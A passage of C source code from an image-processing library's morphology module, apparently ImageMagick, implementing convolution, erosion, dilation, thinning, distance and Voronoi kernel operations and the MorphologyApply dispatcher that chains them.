for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
alpha,
gamma,
intensity,
maximum,
minimum,
pixel;
PixelChannel
channel;
PixelTrait
morphology_traits,
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
u;
size_t
count;
ssize_t
v;
channel=GetPixelChannelChannel(image,i);
traits=GetPixelChannelTraits(image,channel);
morphology_traits=GetPixelChannelTraits(morphology_image,channel);
if ((traits == UndefinedPixelTrait) ||
(morphology_traits == UndefinedPixelTrait))
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
{
SetPixelChannel(morphology_image,channel,p[center+i],q);
continue;
}
pixels=p;
maximum=0.0;
minimum=(double) QuantumRange;
count=kernel->width*kernel->height;
switch (method)
{
case ConvolveMorphology: pixel=bias; break;
case DilateMorphology:
case ErodeIntensityMorphology:
{
pixel=0.0;
break;
}
default:
{
pixel=(double) p[center+i];
break;
}
}
gamma=1.0;
switch (method)
{
case ConvolveMorphology:
{
/*
Weighted Average of pixels using reflected kernel
For correct working of this operation for asymetrical kernels,
the kernel needs to be applied in its reflected form. That is
its values needs to be reversed.
Correlation is actually the same as this but without reflecting
the kernel, and thus 'lower-level' that Convolution. However as
Convolution is the more common method used, and it does not
really cost us much in terms of processing to use a reflected
kernel, so it is Convolution that is implemented.
Correlation will have its kernel reflected before calling this
function to do a Convolve.
For more details of Correlation vs Convolution see
http://www.cs.umd.edu/~djacobs/CMSC426/Convolution.pdf
*/
k=(&kernel->values[kernel->width*kernel->height-1]);
count=0;
if ((morphology_traits & BlendPixelTrait) == 0)
{
/*
No alpha blending.
*/
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
pixel+=(*k)*pixels[i];
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
/*
Alpha blending.
*/
gamma=0.0;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
alpha=(double) (QuantumScale*GetPixelAlpha(image,pixels));
pixel+=alpha*(*k)*pixels[i];
gamma+=alpha*(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case ErodeMorphology:
{
/*
Minimum value within kernel neighbourhood.
The kernel is not reflected for this operation. In normal
Greyscale Morphology, the kernel value should be added
to the real value, this is currently not done, due to the
nature of the boolean kernels being used.
*/
k=kernel->values;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k >= 0.5))
{
if ((double) pixels[i] < pixel)
pixel=(double) pixels[i];
}
k++;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case DilateMorphology:
{
/*
Maximum value within kernel neighbourhood.
For correct working of this operation for asymetrical kernels,
the kernel needs to be applied in its reflected form. That is
its values needs to be reversed.
In normal Greyscale Morphology, the kernel value should be
added to the real value, this is currently not done, due to the
nature of the boolean kernels being used.
*/
count=0;
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k > 0.5))
{
if ((double) pixels[i] > pixel)
pixel=(double) pixels[i];
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
{
/*
Minimum of foreground pixel minus maxumum of background pixels.
The kernel is not reflected for this operation, and consists
of both foreground and background pixel neighbourhoods, 0.0 for
background, and 1.0 for foreground with either Nan or 0.5 values
for don't care.
This never produces a meaningless negative result. Such results
cause Thinning/Thicken to not work correctly when used against a
greyscale image.
*/
count=0;
k=kernel->values;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if (*k > 0.7)
{
if ((double) pixels[i] < pixel)
pixel=(double) pixels[i];
}
else
if (*k < 0.3)
{
if ((double) pixels[i] > maximum)
maximum=(double) pixels[i];
}
count++;
}
k++;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
pixel-=maximum;
if (pixel < 0.0)
pixel=0.0;
if (method == ThinningMorphology)
pixel=(double) p[center+i]-pixel;
else
if (method == ThickenMorphology)
pixel+=(double) p[center+i]+pixel;
break;
}
case ErodeIntensityMorphology:
{
/*
Select pixel with minimum intensity within kernel neighbourhood.
The kernel is not reflected for this operation.
*/
count=0;
k=kernel->values;
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k >= 0.5))
{
intensity=(double) GetPixelIntensity(image,pixels);
if (intensity < minimum)
{
pixel=(double) pixels[i];
minimum=intensity;
}
count++;
}
k++;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case DilateIntensityMorphology:
{
/*
Select pixel with maximum intensity within kernel neighbourhood.
The kernel is not reflected for this operation.
*/
count=0;
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k) && (*k >= 0.5))
{
intensity=(double) GetPixelIntensity(image,pixels);
if (intensity > maximum)
{
pixel=(double) pixels[i];
maximum=intensity;
}
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case IterativeDistanceMorphology:
{
/*
Compute th iterative distance from black edge of a white image
shape. Essentually white values are decreased to the smallest
'distance from edge' it can find.
It works by adding kernel values to the neighbourhood, and and
select the minimum value found. The kernel is rotated before
use, so kernel distances match resulting distances, when a user
provided asymmetric kernel is applied.
This code is nearly identical to True GrayScale Morphology but
not quite.
GreyDilate Kernel values added, maximum value found Kernel is
rotated before use.
GrayErode: Kernel values subtracted and minimum value found No
kernel rotation used.
Note the the Iterative Distance method is essentially a
GrayErode, but with negative kernel values, and kernel rotation
applied.
*/
count=0;
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
count++;
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
break;
}
case UndefinedMorphology:
default:
break;
}
if (fabs(pixel-p[center+i]) > MagickEpsilon)
changes[id]++;
gamma=PerceptibleReciprocal(gamma);
if (count != 0)
gamma*=(double) kernel->height*kernel->width/count;
SetPixelChannel(morphology_image,channel,ClampToQuantum(gamma*pixel),q);
}
p+=GetPixelChannels(image);
q+=GetPixelChannels(morphology_image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyPrimitive)
#endif
proceed=SetImageProgress(image,MorphologyTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
for (j=0; j < (ssize_t) GetOpenMPMaximumThreads(); j++)
changed+=changes[j];
changes=(size_t *) RelinquishMagickMemory(changes);
return(status ? (ssize_t) changed : -1);
}
/*
This is almost identical to the MorphologyPrimative() function above, but
applies the primitive directly to the actual image using two passes, once in
each direction, with the results of the previous (and current) row being
re-used.
That is after each row is 'Sync'ed' into the image, the next row makes use of
those values as part of the calculation of the next row. It repeats, but
going in the oppisite (bottom-up) direction.
Because of this 're-use of results' this function can not make use of multi-
threaded, parellel processing.
*/
static ssize_t MorphologyPrimitiveDirect(Image *image,
const MorphologyMethod method,const KernelInfo *kernel,
ExceptionInfo *exception)
{
CacheView
*morphology_view,
*image_view;
MagickBooleanType
status;
MagickOffsetType
progress;
OffsetInfo
offset;
size_t
width,
changed;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickCoreSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=MagickTrue;
changed=0;
progress=0;
switch(method)
{
case DistanceMorphology:
case VoronoiMorphology:
{
/*
Kernel reflected about origin.
*/
offset.x=(ssize_t) kernel->width-kernel->x-1;
offset.y=(ssize_t) kernel->height-kernel->y-1;
break;
}
default:
{
offset.x=kernel->x;
offset.y=kernel->y;
break;
}
}
/*
Two views into same image, do not thread.
*/
image_view=AcquireVirtualCacheView(image,exception);
morphology_view=AcquireAuthenticCacheView(image,exception);
width=image->columns+kernel->width-1;
for (y=0; y < (ssize_t) image->rows; y++)
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
center;
/*
Read virtual pixels, and authentic pixels, from the same image! We read
using virtual to get virtual pixel handling, but write back into the same
image.
Only top half of kernel is processed as we do a single pass downward
through the image iterating the distance function as we go.
*/
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,-offset.x,y-offset.y,width,(size_t)
offset.y+1,exception);
q=GetCacheViewAuthenticPixels(morphology_view,0,y,image->columns,1,
exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
center=(ssize_t) (GetPixelChannels(image)*width*offset.y+
GetPixelChannels(image)*offset.x);
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
pixel;
PixelTrait
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
u;
ssize_t
v;
traits=GetPixelChannelTraits(image,(PixelChannel) i);
if (traits == UndefinedPixelTrait)
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
continue;
pixels=p;
pixel=(double) QuantumRange;
switch (method)
{
case DistanceMorphology:
{
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v <= offset.y; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
pixels=q-offset.x*GetPixelChannels(image);
for (u=0; u < offset.x; u++)
{
if (!IsNaN(*k) && ((x+u-offset.x) >= 0))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
break;
}
case VoronoiMorphology:
{
k=(&kernel->values[kernel->width*kernel->height-1]);
for (v=0; v < offset.y; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
pixels=q-offset.x*GetPixelChannels(image);
for (u=0; u < offset.x; u++)
{
if (!IsNaN(*k) && ((x+u-offset.x) >= 0))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
break;
}
default:
break;
}
if (fabs(pixel-q[i]) > MagickEpsilon)
changed++;
q[i]=ClampToQuantum(pixel);
}
p+=GetPixelChannels(image);
q+=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,MorphologyTag,progress++,2*image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
/*
Do the reverse pass through the image.
*/
image_view=AcquireVirtualCacheView(image,exception);
morphology_view=AcquireAuthenticCacheView(image,exception);
for (y=(ssize_t) image->rows-1; y >= 0; y--)
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
center;
/*
Read virtual pixels, and authentic pixels, from the same image. We
read using virtual to get virtual pixel handling, but write back
into the same image.
Only the bottom half of the kernel is processed as we up the image.
*/
if (status == MagickFalse)
continue;
p=GetCacheViewVirtualPixels(image_view,-offset.x,y,width,(size_t)
kernel->y+1,exception);
q=GetCacheViewAuthenticPixels(morphology_view,0,y,image->columns,1,
exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
p+=(image->columns-1)*GetPixelChannels(image);
q+=(image->columns-1)*GetPixelChannels(image);
center=(ssize_t) (offset.x*GetPixelChannels(image));
for (x=(ssize_t) image->columns-1; x >= 0; x--)
{
register ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
double
pixel;
PixelTrait
traits;
register const MagickRealType
*magick_restrict k;
register const Quantum
*magick_restrict pixels;
register ssize_t
u;
ssize_t
v;
traits=GetPixelChannelTraits(image,(PixelChannel) i);
if (traits == UndefinedPixelTrait)
continue;
if (((traits & CopyPixelTrait) != 0) ||
(GetPixelWriteMask(image,p+center) <= (QuantumRange/2)))
continue;
pixels=p;
pixel=(double) QuantumRange;
switch (method)
{
case DistanceMorphology:
{
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
for (v=offset.y; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*kernel->y+kernel->x-1]);
pixels=q;
for (u=offset.x+1; u < (ssize_t) kernel->width; u++)
{
pixels+=GetPixelChannels(image);
if (!IsNaN(*k) && ((x+u-offset.x) < (ssize_t) image->columns))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
}
break;
}
case VoronoiMorphology:
{
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
for (v=offset.y; v < (ssize_t) kernel->height; v++)
{
for (u=0; u < (ssize_t) kernel->width; u++)
{
if (!IsNaN(*k))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
pixels+=GetPixelChannels(image);
}
pixels+=(image->columns-1)*GetPixelChannels(image);
}
k=(&kernel->values[kernel->width*(kernel->y+1)-1]);
pixels=q;
for (u=offset.x+1; u < (ssize_t) kernel->width; u++)
{
pixels+=GetPixelChannels(image);
if (!IsNaN(*k) && ((x+u-offset.x) < (ssize_t) image->columns))
{
if ((pixels[i]+(*k)) < pixel)
pixel=(double) pixels[i]+(*k);
}
k--;
}
break;
}
default:
break;
}
if (fabs(pixel-q[i]) > MagickEpsilon)
changed++;
q[i]=ClampToQuantum(pixel);
}
p-=GetPixelChannels(image);
q-=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(morphology_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,MorphologyTag,progress++,2*image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
morphology_view=DestroyCacheView(morphology_view);
image_view=DestroyCacheView(image_view);
return(status ? (ssize_t) changed : -1);
}
/*
Apply a Morphology by calling one of the above low level primitive
application functions. This function handles any iteration loops,
composition or re-iteration of results, and compound morphology methods that
is based on multiple low-level (staged) morphology methods.
Basically this provides the complex glue between the requested morphology
method and raw low-level implementation (above).
*/
MagickPrivate Image *MorphologyApply(const Image *image,
const MorphologyMethod method, const ssize_t iterations,
const KernelInfo *kernel, const CompositeOperator compose,const double bias,
ExceptionInfo *exception)
{
CompositeOperator
curr_compose;
Image
*curr_image, /* Image we are working with or iterating */
*work_image, /* secondary image for primitive iteration */
*save_image, /* saved image - for 'edge' method only */
*rslt_image; /* resultant image - after multi-kernel handling */
KernelInfo
*reflected_kernel, /* A reflected copy of the kernel (if needed) */
*norm_kernel, /* the current normal un-reflected kernel */
*rflt_kernel, /* the current reflected kernel (if needed) */
*this_kernel; /* the kernel being applied */
MorphologyMethod
primitive; /* the current morphology primitive being applied */
CompositeOperator
rslt_compose; /* multi-kernel compose method for results to use */
MagickBooleanType
special, /* do we use a direct modify function? */
verbose; /* verbose output of results */
size_t
method_loop, /* Loop 1: number of compound method iterations (norm 1) */
method_limit, /* maximum number of compound method iterations */
kernel_number, /* Loop 2: the kernel number being applied */
stage_loop, /* Loop 3: primitive loop for compound morphology */
stage_limit, /* how many primitives are in this compound */
kernel_loop, /* Loop 4: iterate the kernel over image */
kernel_limit, /* number of times to iterate kernel */
count, /* total count of primitive steps applied */
kernel_changed, /* total count of changed using iterated kernel */
method_changed; /* total count of changed over method iteration */
ssize_t
changed; /* number pixels changed by last primitive operation */
char
v_info[MagickPathExtent];
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickCoreSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
count = 0; /* number of low-level morphology primitives performed */
if ( iterations == 0 )
return((Image *) NULL); /* null operation - nothing to do! */
kernel_limit = (size_t) iterations;
if ( iterations < 0 ) /* negative interations = infinite (well alomst) */
kernel_limit = image->columns>image->rows ? image->columns : image->rows;
verbose = IsStringTrue(GetImageArtifact(image,"debug"));
/* initialise for cleanup */
curr_image = (Image *) image;
curr_compose = image->compose;
(void) curr_compose;
work_image = save_image = rslt_image = (Image *) NULL;
reflected_kernel = (KernelInfo *) NULL;
/* Initialize specific methods
* + which loop should use the given iteratations
* + how many primitives make up the compound morphology
* + multi-kernel compose method to use (by default)
*/
method_limit = 1; /* just do method once, unless otherwise set */
stage_limit = 1; /* assume method is not a compound */
special = MagickFalse; /* assume it is NOT a direct modify primitive */
rslt_compose = compose; /* and we are composing multi-kernels as given */
switch( method ) {
case SmoothMorphology: /* 4 primitive compound morphology */
stage_limit = 4;
break;
case OpenMorphology: /* 2 primitive compound morphology */
case OpenIntensityMorphology:
case TopHatMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case EdgeMorphology:
stage_limit = 2;
break;
case HitAndMissMorphology:
rslt_compose = LightenCompositeOp; /* Union of multi-kernel results */
/* FALL THUR */
case ThinningMorphology:
case ThickenMorphology:
method_limit = kernel_limit; /* iterate the whole method */
kernel_limit = 1; /* do not do kernel iteration */
break;
case DistanceMorphology:
case VoronoiMorphology:
special = MagickTrue; /* use special direct primative */
break;
default:
break;
}
/* Apply special methods with special requirments
** For example, single run only, or post-processing requirements
*/
if ( special != MagickFalse )
{
rslt_image=CloneImage(image,0,0,MagickTrue,exception);
if (rslt_image == (Image *) NULL)
goto error_cleanup;
if (SetImageStorageClass(rslt_image,DirectClass,exception) == MagickFalse)
goto error_cleanup;
changed=MorphologyPrimitiveDirect(rslt_image,method,kernel,exception);
if (verbose != MagickFalse)
(void) (void) FormatLocaleFile(stderr,
"%s:%.20g.%.20g #%.20g => Changed %.20g\n",
CommandOptionToMnemonic(MagickMorphologyOptions, method),
1.0,0.0,1.0, (double) changed);
if ( changed < 0 )
goto error_cleanup;
if ( method == VoronoiMorphology ) {
/* Preserve the alpha channel of input image - but turned it off */
(void) SetImageAlphaChannel(rslt_image, DeactivateAlphaChannel,
exception);
(void) CompositeImage(rslt_image,image,CopyAlphaCompositeOp,
MagickTrue,0,0,exception);
(void) SetImageAlphaChannel(rslt_image, DeactivateAlphaChannel,
exception);
}
goto exit_cleanup;
}
/* Handle user (caller) specified multi-kernel composition method */
if ( compose != UndefinedCompositeOp )
rslt_compose = compose; /* override default composition for method */
if ( rslt_compose == UndefinedCompositeOp )
rslt_compose = NoCompositeOp; /* still not defined! Then re-iterate */
/* Some methods require a reflected kernel to use with primitives.
* Create the reflected kernel for those methods. */
switch ( method ) {
case CorrelateMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case SmoothMorphology:
reflected_kernel = CloneKernelInfo(kernel);
if (reflected_kernel == (KernelInfo *) NULL)
goto error_cleanup;
RotateKernelInfo(reflected_kernel,180);
break;
default:
break;
}
/* Loops around more primitive morpholgy methods
** erose, dilate, open, close, smooth, edge, etc...
*/
/* Loop 1: iterate the compound method */
method_loop = 0;
method_changed = 1;
while ( method_loop < method_limit && method_changed > 0 ) {
method_loop++;
method_changed = 0;
/* Loop 2: iterate over each kernel in a multi-kernel list */
norm_kernel = (KernelInfo *) kernel;
this_kernel = (KernelInfo *) kernel;
rflt_kernel = reflected_kernel;
kernel_number = 0;
while ( norm_kernel != NULL ) {
/* Loop 3: Compound Morphology Staging - Select Primative to apply */
stage_loop = 0; /* the compound morphology stage number */
while ( stage_loop < stage_limit ) {
stage_loop++; /* The stage of the compound morphology */
/* Select primitive morphology for this stage of compound method */
this_kernel = norm_kernel; /* default use unreflected kernel */
primitive = method; /* Assume method is a primitive */
switch( method ) {
case ErodeMorphology: /* just erode */
case EdgeInMorphology: /* erode and image difference */
primitive = ErodeMorphology;
break;
case DilateMorphology: /* just dilate */
case EdgeOutMorphology: /* dilate and image difference */
primitive = DilateMorphology;
break;
case OpenMorphology: /* erode then dialate */
case TopHatMorphology: /* open and image difference */
primitive = ErodeMorphology;
if ( stage_loop == 2 )
primitive = DilateMorphology;
break;
case OpenIntensityMorphology:
primitive = ErodeIntensityMorphology;
if ( stage_loop == 2 )
primitive = DilateIntensityMorphology;
break;
case CloseMorphology: /* dilate, then erode */
case BottomHatMorphology: /* close and image difference */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
if ( stage_loop == 2 )
primitive = ErodeMorphology;
break;
case CloseIntensityMorphology:
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateIntensityMorphology;
if ( stage_loop == 2 )
primitive = ErodeIntensityMorphology;
break;
case SmoothMorphology: /* open, close */
switch ( stage_loop ) {
case 1: /* start an open method, which starts with Erode */
primitive = ErodeMorphology;
break;
case 2: /* now Dilate the Erode */
primitive = DilateMorphology;
break;
case 3: /* Reflect kernel a close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
break;
case 4: /* Finish the Close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ErodeMorphology;
break;
}
break;
case EdgeMorphology: /* dilate and erode difference */
primitive = DilateMorphology;
if ( stage_loop == 2 ) {
save_image = curr_image; /* save the image difference */
curr_image = (Image *) image;
primitive = ErodeMorphology;
}
break;
case CorrelateMorphology:
/* A Correlation is a Convolution with a reflected kernel.
** However a Convolution is a weighted sum using a reflected
** kernel. It may seem stange to convert a Correlation into a
** Convolution as the Correlation is the simplier method, but
** Convolution is much more commonly used, and it makes sense to
** implement it directly so as to avoid the need to duplicate the
** kernel when it is not required (which is typically the
** default).
*/
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ConvolveMorphology;
break;
default:
break;
}
assert( this_kernel != (KernelInfo *) NULL );
/* Extra information for debugging compound operations */
if (verbose != MagickFalse) {
if ( stage_limit > 1 )
(void) FormatLocaleString(v_info,MagickPathExtent,"%s:%.20g.%.20g -> ",
CommandOptionToMnemonic(MagickMorphologyOptions,method),(double)
method_loop,(double) stage_loop);
else if ( primitive != method )
(void) FormatLocaleString(v_info, MagickPathExtent, "%s:%.20g -> ",
CommandOptionToMnemonic(MagickMorphologyOptions, method),(double)
method_loop);
else
v_info[0] = '\0';
}
/* Loop 4: Iterate the kernel with primitive */
kernel_loop = 0;
kernel_changed = 0;
changed = 1;
while ( kernel_loop < kernel_limit && changed > 0 ) {
kernel_loop++; /* the iteration of this kernel */
/* Create a clone as the destination image, if not yet defined */
if ( work_image == (Image *) NULL )
{
work_image=CloneImage(image,0,0,MagickTrue,exception);
if (work_image == (Image *) NULL)
goto error_cleanup;
if (SetImageStorageClass(work_image,DirectClass,exception) == MagickFalse)
goto error_cleanup;
}
/* APPLY THE MORPHOLOGICAL PRIMITIVE (curr -> work) */
count++;
changed = MorphologyPrimitive(curr_image, work_image, primitive,
this_kernel, bias, exception);
if (verbose != MagickFalse) {
if ( kernel_loop > 1 )
(void) FormatLocaleFile(stderr, "\n"); /* add end-of-line from previous */
(void) (void) FormatLocaleFile(stderr,
"%s%s%s:%.20g.%.20g #%.20g => Changed %.20g",
v_info,CommandOptionToMnemonic(MagickMorphologyOptions,
primitive),(this_kernel == rflt_kernel ) ? "*" : "",
(double) (method_loop+kernel_loop-1),(double) kernel_number,
(double) count,(double) changed);
}
if ( changed < 0 )
goto error_cleanup;
kernel_changed += changed;
method_changed += changed;
/* prepare next loop */
{ Image *tmp = work_image; /* swap images for iteration */
work_image = curr_image;
curr_image = tmp;
}
if ( work_image == image )
work_image = (Image *) NULL; /* replace input 'image' */
} /* End Loop 4: Iterate the kernel with primitive */
if (verbose != MagickFalse && kernel_changed != (size_t)changed)
(void) FormatLocaleFile(stderr, " Total %.20g",(double) kernel_changed);
if (verbose != MagickFalse && stage_loop < stage_limit)
(void) FormatLocaleFile(stderr, "\n"); /* add end-of-line before looping */
#if 0
(void) FormatLocaleFile(stderr, "--E-- image=0x%lx\n", (unsigned long)image);
(void) FormatLocaleFile(stderr, " curr =0x%lx\n", (unsigned long)curr_image);
(void) FormatLocaleFile(stderr, " work =0x%lx\n", (unsigned long)work_image);
(void) FormatLocaleFile(stderr, " save =0x%lx\n", (unsigned long)save_image);
(void) FormatLocaleFile(stderr, " union=0x%lx\n", (unsigned long)rslt_image);
#endif
} /* End Loop 3: Primative (staging) Loop for Coumpound Methods */
/* Final Post-processing for some Compound Methods
**
** The removal of any 'Sync' channel flag in the Image Compositon
** below ensures the methematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** Turn off SVG composition 'alpha blending'.
*/
switch( method ) {
case EdgeOutMorphology:
case EdgeInMorphology:
case TopHatMorphology:
case BottomHatMorphology:
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr,
"\n%s: Difference with original image",CommandOptionToMnemonic(
MagickMorphologyOptions, method) );
(void) CompositeImage(curr_image,image,DifferenceCompositeOp,
MagickTrue,0,0,exception);
break;
case EdgeMorphology:
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr,
"\n%s: Difference of Dilate and Erode",CommandOptionToMnemonic(
MagickMorphologyOptions, method) );
(void) CompositeImage(curr_image,save_image,DifferenceCompositeOp,
MagickTrue,0,0,exception);
save_image = DestroyImage(save_image); /* finished with save image */
break;
default:
break;
}
/* multi-kernel handling: re-iterate, or compose results */
if ( kernel->next == (KernelInfo *) NULL )
rslt_image = curr_image; /* just return the resulting image */
else if ( rslt_compose == NoCompositeOp )
{ if (verbose != MagickFalse) {
if ( this_kernel->next != (KernelInfo *) NULL )
(void) FormatLocaleFile(stderr, " (re-iterate)");
else
(void) FormatLocaleFile(stderr, " (done)");
}
rslt_image = curr_image; /* return result, and re-iterate */
}
else if ( rslt_image == (Image *) NULL)
{ if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr, " (save for compose)");
rslt_image = curr_image;
curr_image = (Image *) image; /* continue with original image */
}
else
{ /* Add the new 'current' result to the composition
**
** The removal of any 'Sync' channel flag in the Image Compositon
** below ensures the methematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** IE: Turn off SVG composition 'alpha blending'.
*/
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr, " (compose \"%s\")",
CommandOptionToMnemonic(MagickComposeOptions, rslt_compose) );
(void) CompositeImage(rslt_image,curr_image,rslt_compose,MagickTrue,
0,0,exception);
curr_image = DestroyImage(curr_image);
curr_image = (Image *) image; /* continue with original image */
}
if (verbose != MagickFalse)
(void) FormatLocaleFile(stderr, "\n");
/* loop to the next kernel in a multi-kernel list */
norm_kernel = norm_kernel->next;
if ( rflt_kernel != (KernelInfo *) NULL )
rflt_kernel = rflt_kernel->next;
kernel_number++;
} /* End Loop 2: Loop over each kernel */
} /* End Loop 1: compound method interation */
goto exit_cleanup;
/* Yes goto's are bad, but it makes cleanup lot more efficient */
error_cleanup:
if ( curr_image == rslt_image )
curr_image = (Image *) NULL;
if ( rslt_image != (Image *) NULL )
rslt_image = DestroyImage(rslt_image);
exit_cleanup:
if ( curr_image == rslt_image || curr_image == image )
curr_image = (Image *) NULL;
if ( curr_image != (Image *) NULL )
curr_image = DestroyImage(curr_image);
if ( work_image != (Image *) NULL )
work_image = DestroyImage(work_image);
if ( save_image != (Image *) NULL )
save_image = DestroyImage(save_image);
if ( reflected_kernel != (KernelInfo *) NULL )
reflected_kernel = DestroyKernelInfo(reflected_kernel);
return(rslt_image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y I m a g e %
% %
% %
% %
